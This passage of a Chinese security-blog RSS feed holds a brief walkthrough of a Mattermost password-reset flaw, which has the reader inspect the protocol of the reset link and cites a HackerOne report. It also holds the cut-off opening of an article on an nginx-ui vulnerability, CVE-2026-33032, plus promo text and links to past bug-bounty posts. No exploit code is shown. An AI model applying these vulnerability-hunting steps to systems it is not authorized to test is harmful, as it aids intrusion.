0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">这里，服务器会不会去请求？</span></strong></p></div></div><div style="font-size: 19px;box-sizing: border-box;"><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><span leaf="">往期回顾</span><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8019b97d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499361%26idx%3D1%26sn%3Ddfdaec5067727fdc3bb907b4d1ed39f4">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 27 Apr 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>密码重置中所存在的安全隐患</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499357&amp;idx=1&amp;sn=79113442ca85c7ddaaad92b147aad410</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-04-24 10:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=5d0671d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRxyOIXwjicQhAMnKLPbicKQh52K0ib4PIyAvj8afd4bbMnkfpWxBB5xvYsibylTSdfpicjiaSzC6ic3zwOZ93RkP1TcTIdzvxrKDTY79Q%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">密码重置中所存在的安全隐患</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=3979222b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRzHqObTSGUjd7BBg9v19Fj1TpptlicswETkn1rtyhy8icIycj22DRIjYfedKdMv5CGfdMkQhiarwAVdiaIUSZc7ZycxU6ke7UxFicTA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">注册一个工作区 访问 </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://h1-*你的实例*.cloud.mattermost.com/reset_password" target="_blank">https://h1-*你的实例*.cloud.mattermost.com/reset_password</a></span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">并输入注册邮箱 检查邮箱，你会收到一个重置密码的链接</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100015704" data-s="300,640" type="block" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=a81f310c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRwibbxYP1MDE7SmVZLpicy85QeAan2GDl0FP7frUjGNp70rCnFB0oZr420U2bT0XUQkibjnkuar9GFbxoK49jf6G48pjWhE4Yoeibo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="color: rgb(63, 63, 63);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.32px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf="">复制该链接，粘贴到记事本中，并观察其中的协议（protocol）</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100015706" data-s="300,640" type="block" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=b785473c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxl8ONOxc3yiazY3OOiaJlpWIiaFSCbJ6DpDTNK5ewZ9yhEkxibxOa7DuZ9jp3iaqu6TF843ziaVmZqV3daAQ15mHGx1Wqeia6MJ3a1dY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=9148cff7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRxT7iauic2Bb1TcRacRcTYM8z4SQYxjmV0NTmInPqZdjicicsniaIITzSvBYmF6iajtiaVMnWHUqLzv9FXxaj1X2JQttyMMa5blZkBn5U%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1888915" target="_blank">https://hackerone.com/reports/1888915</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5ba438d1&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499357%26idx%3D1%26sn%3D79113442ca85c7ddaaad92b147aad410">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>1day:可实现Nginx服务器完全控制</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499371&amp;idx=1&amp;sn=32c47ad71d300fe9cbe182df852f982c</link>
      <description>声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部</description>
      <content:encoded><![CDATA[<p><span>骨哥说事</span> <span>2026-04-23 10:13</span> <span style="display: inline-block;">四川</span></p>




  <p>以下文章来源于：骨哥说事</p>
  <strong>骨哥说事</strong>
  <p>一个喜爱鼓捣的技术宅</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e6b4e5c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F7xtecWUgCRwD0HOax8weJD5sNc9jhCC1lMTalfFJFWmEjmgVkC3ibD28rGO4X7B6YH1D38QlZtqHD3WHibcgibk0A4LibyPkvzVhxd4axhAib1B0%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <table><tbody><tr><td data-colwidth="557" width="557" valign="top" style="word-break: break-all;"><h1 data-selectable-paragraph="" style="white-space: normal;outline: 0px;max-width: 100%;font-family: -apple-system, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;font-size: 18px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="color: rgb(255, 0, 0);"><strong><span style="font-size: 15px;"><span leaf="">声明：</span></span></strong></span></span></strong><span style="outline: 0px;max-width: 100%;font-size: 18px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="font-size: 15px;"><span leaf="">文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。</span></span></span></h1></td></tr></tbody></table><div data-tool="markdown2wechat编辑器" data-website="https://aizhuanqian.com" style="color: black;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 14px;padding: 10px;margin-bottom: 24px;" data-pm-slice="0 0 []"><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">近日，一款流行的基于Web的Nginx管理工具nginx-ui中发现了一个关键安全漏洞，并且已被在野利用。该工具在GitHub上拥有超过11K星标和43万+的Docker拉取量。漏洞</span><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;color: #ff6441;"><span leaf="">CVE-2026-33032</span></code><span leaf="">的CVSS得分为9.8，使攻击者能够完全控制Nginx服务器。</span></p><h2 data-tool="mdnice 编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-size: 22px;text-align: center;font-weight: bold;color: black;line-height: 1.1em;padding-top: 12px;padding-bottom: 12px;margin: 70px 30px 30px;border: 1px solid #000;"><span style="display: block;-webkit-box-reflect: below 0em -webkit-gradient(linear,left top,left bottom, from(rgba(0,0,0,0)),to(rgba(255,255,255,0.1)));"><span leaf="">场景理解</span></span></h2><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><span leaf="">nginx-ui使用了mcp-go库中的SSE传输。以下是两个重要的端点：</span></p><p data-tool="mdnice 编辑器" style="padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;font-size: 14px;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 